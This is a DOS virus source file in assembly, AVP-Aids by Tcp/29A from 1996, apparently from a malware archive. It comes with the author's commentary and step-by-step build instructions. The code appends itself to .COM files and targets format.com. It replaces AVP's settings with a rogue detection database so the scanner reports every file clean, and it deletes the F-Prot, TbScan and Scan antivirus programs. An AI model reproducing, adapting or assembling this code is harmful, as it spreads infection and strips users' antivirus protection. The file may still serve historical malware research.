MalwareSourceCode/MSDOS/A-Index/Virus.MSDOS.Unknown.avpaids.asm

328 lines
8.7 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; AVP-Aids, <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>
; by Tcp/29A <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>
;
; AVP is probably the best antivirus nowadays, but it's the most easily
; foolable too :) One of its best advantages is that the user himself is
; able to write his own detection and disinfection routines for any new
; virus he may find. But a virus author could use that facilities to
; write a virus, don't you think? :)
;
; All we need to have is the routine editor (AVPRO) which is included in
; the registrated version of AVP (2.1 and above), or the -older- one in-
; cluded in the shareware version of AVP 2.0, which is the one i used.
;
; This routine editor gives us a lot of functions and structures we can
; call. For more info on this, read their definitions in a file named
; DLINK.H which is included in AVP.
;
; Having access to the vectors of those functions, we may either change
; or redirect them as a normal virus does with the standard interrupt
; vectors. We could write trojans, droppers, a stealth routine, and even
; a whole virus... imagination is the only limit you have ;)
;
; As an example of this, i wrote a simple virus which i named AVP-Aids,
; because it works in the same way as the known disease does:
;
; - It destroys the organism defenses: deletes F-Prot, TbScan and Scan
; when AVP tries to scan them.
; - Favours the appearing of opportunist diseases: AVP won't detect any
; virus (only a few using it heuristic scanner), so any virus, though
; being a super-old one, will be able to infect the system.
;
; I recommend the reading of the file USERGUID.DOC which is included in
; the AVP pack for a better comprehension about the way AVP-Aids works.
;
; For getting a working dropper of AVP-Aids, first compile the next two
; files (tasm /m /ml /q avp_dec.asm; tasm /m /ml /q avp_jmp.asm).
;
; <20><><EFBFBD><EFBFBD> File: AVP_DEC.ASM <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
aids_decode segment byte public 'CODE'
assume cs:aids_decode
_decode proc far
aids proc far
push ds
push bp
mov bp,seg _Page_A ; Get AVP's data segment
mov ds,bp
les di,ds:_Page_A ; Get pointer to Page_A
mov cx,400h ; Length of Page
push cx
mov al,1 ; If al=0 then AVP detects the Win95.Boza.A
; in a high number of files... rules :-DDD
rep stosb ; Clear Page_A
les di,ds:_Page_B
pop cx
push cx
rep stosb ; Clear Page_B
les di,ds:_Header
pop cx
rep stosb ; Clear Header
push ds
pop es
lds si,ds:_File_Name ; File scanned
lodsw
cmp ax,'-f' ; Check for F-*.*
je del_file
cmp ax,'bt' ; Check for TBSCAN
jne check_sc
lodsw
check_sc:
cmp ax,'cs' ; Check for SCAN
jne no_scan
lodsw
cmp ax,'na'
jne no_scan
del_file:
push es
pop ds
lds dx,ds:_File_Full_Name
mov ah,41h
int 21h ; Delete file (F-Prot, Scan, TBScan)
no_scan:
pop bp
pop ds
xor ax,ax
retf ; Return to AVP (AX==0 <-> RCLEAN)
aids endp
_decode endp
aids_decode ends
public _decode
public aids
extrn _Page_A:dword
extrn _Page_B:dword
extrn _Header:dword
extrn _File_Name:dword
extrn _File_Full_Name:dword
end
; <20><><EFBFBD><EFBFBD> EOF: AVP_DEC.ASM <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
; <20><><EFBFBD><EFBFBD> File: AVP_JMP.ASM <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
aids_jmp segment byte public 'CODE'
assume cs:aids_jmp
_jmp proc far
call far ptr aids ; call the aids procedure
retf ; Return to AVP
_jmp endp
aids_jmp ends
public _jmp
extrn aids:far
end
; <20><><EFBFBD><EFBFBD> EOF: AVP_JMP.ASM <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
; Now that we got their corresponding OBJ files, we load AVPRO and edit
; a new viral database which we'll name AVP_AIDS.AVB. Add a File regis-
; ter, and write the name and the commentary you want, it doesn't mind.
; Now we link (Alt-L) an external routine. Choose AVP_DEC.OBJ and accept
; the register.
;
; Because the second OBJ file makes a call to a procedure of the first
; one, we will need AVP to load in memory the database we just created.
; For this we must save this base and add it to the active ones by pres-
; sing F4. Once we have done this, we must edit again AVP_AIDS.AVB and
; add a jmp register. Now link AVP_JMP.OBJ as an external routine, and
; if everything is right we'll be able to save and exit.
;
; After doing all this, we must compile the virus itself: for doing it,
; we must modify the database length equ (length_aids) with the correct
; value and follow the next steps:
;
; tasm /m avp_aids.asm
; tlink avp_aids.obj
; exe2bin avp_aids.exe avp_aids.com
; copy /b 6nops.com+avp_aids.avb+avp_aids.com avp-aids.com
;
; As *all_this* is quite hard to do, Mister Sandman has included a fully
; compiled second generation of this virus in \FILES :)
;
; <20><><EFBFBD><EFBFBD> File: AVP_AIDS.ASM <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
; Name: AVP-Aids
; Author: Tcp / 29A
; When: 6-April-96 : 1st implementation
; November-96: Now doesn't hang AVP 2.2x
;
; Where: Spain
; Comments: A simple and lame virus to demostrate the
; AVPRO API capabilities... to make virii... ;)
; Also fools TBAV... (except this first generation)
LENGTH_AIDS equ 590 ; Place here the length of your base
avp_aids segment byte public
assume cs:avp_aids, ds:avp_aids, ss:avp_aids
org 0
start:
call get_delta
next:
avp_set db 'AVp.SeT',0
base db 'KRN386.AVB',13,10
f_base db 'kRn386.aVb',0
f_mask db '*.cOm',0
_format db 'c:\DoS\fORmaT.cOM',0
six db 0cdh,20h,?,?,?,? ; Original bytes
jmp_vir db 'PK' ; Fools TBScan
pop bx ; Fix ('PK'= push ax, dec bx)
db 0e9h ; jmp
ofs_vir dw ?
db '[AVP-Aids, Tcp / 29A]'
get_delta:
mov di,100h
pop bp
push di
sub bp,offset(next) ; Get delta-offset
mov di,100h
push di
lea si,[bp+six]
movsw
movsw
movsw ; Restore infected file
mov ah,2fh
int 21h ; Get DTA
push es
push bx
lea dx,[bp+offset(dta)]
mov ah,1ah
int 21h ; Set DTA
mov ah,4eh
xor cx,cx
lea dx,[bp+f_mask]
int 21h ; Find-first *.com
jc check_for_format
lea dx,[bp+offset(dta)+1eh]
call infect_file
check_for_format:
lea dx,[bp+offset(_format)] ; Try to infect c:\dos\format.com
call infect_file
mov ax,3d00h ; Search for avp.set
lea dx,[bp+avp_set]
int 21h
jc exec_host
xchg ax,bx
mov ah,3fh
lea dx,[bp+dta]
mov cx,666h ;-)
int 21h
push ax ; length(AVP.SET)
mov ah,3eh
int 21h ; Close file
mov ah,3ch
xor cx,cx
lea dx,[bp+f_base]
int 21h ; Create krn386.avb (viral database)
xchg ax,bx
mov ah,40h
push ax
lea dx,[bp+base]
mov cx,offset(f_base)-offset(base)
int 21h ; Write base name in file
pop ax
lea dx,[bp+dta]
pop cx
int 21h ; Write rest of AVP.SET
mov ah,3eh
int 21h
mov ah,41h
lea dx,[bp+avp_set]
int 21h ; Delete AVP.SET
mov ah,56h
mov di,dx
lea dx,[bp+f_base]
int 21h ; Rename krn386.avb to AVP.SET
mov ah,3ch
xor cx,cx
int 21h ; Reset krn386.avb
xchg ax,bx
mov ah,40h
lea dx,[bp+aids_base]
mov cx,LENGTH_AIDS
int 21h ; Write the AVP-AIDS base
mov ah,3eh
int 21h
exec_host:
pop dx
pop ds
mov ah,1ah
int 21h ; Restore DTA
push cs
push cs
pop ds
pop es
ret
infect_file:
mov ax,3d02h
int 21h ; Open
jc no_file
xchg ax,bx
mov ah,3fh
mov cx,6
lea dx,[bp+offset(six)]
int 21h ; Read 6 bytes
cmp ax,cx ; File >6 bytes?
jne close_file ; No? ten jmp
cmp word ptr [bp+six],'ZM' ; EXE file but .com extension?
je close_file ; Yes? then jmp
cmp word ptr [bp+six],'KP' ; Already infected?
je close_file ; Yes? then jmp
mov ax,4202h
cwd
xor cx,cx
int 21h ; Go end
mov ah,40h
mov dx,bp
mov cx,offset(vir_end)
int 21h ; Write virus
mov ax,4200h
cwd
xor cx,cx
int 21h ; Go start
mov ax,[bp+offset(dta)+1ah] ; File size
sub ax,6
mov [bp+ofs_vir],ax
mov ah,40h
lea dx,[bp+jmp_vir]
mov cx,6
int 21h ; Write jump to virus
mov ax,5701h
mov cx,[bp+offset(dta)+16h] ; Time
mov dx,[bp+offset(dta)+18h] ; Date
int 21h ; Set time/date to original
close_file:
mov ah,3eh
int 21h ; Close file
no_file:
ret
aids_base db LENGTH_AIDS dup(?)
vir_end:
dta:
avp_aids ends
end start